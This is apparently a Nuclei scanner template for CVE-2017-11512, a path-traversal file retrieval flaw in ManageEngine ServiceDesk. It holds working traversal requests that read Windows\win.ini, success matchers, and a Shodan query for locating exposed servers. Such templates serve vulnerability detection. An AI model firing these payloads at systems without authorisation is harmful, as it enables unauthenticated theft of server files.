41 lines
1.4 KiB
YAML
41 lines
1.4 KiB
YAML
id: CVE-2017-11512
|
|
|
|
info:
|
|
name: ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: |
|
|
ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
|
|
reference:
|
|
- https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html
|
|
- https://www.tenable.com/security/research/tra-2017-31
|
|
- https://web.archive.org/web/20210116180015/https://www.securityfocus.com/bid/101789/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-11512
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2017-11512
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
shodan-query: http.title:"ManageEngine"
|
|
verified: "true"
|
|
tags: cve,cve2017,manageengine,lfr,unauth,tenable
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini'
|
|
- '{{BaseURL}}/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini'
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|
|
|
|
# Enhanced by mp on 2022/06/09
|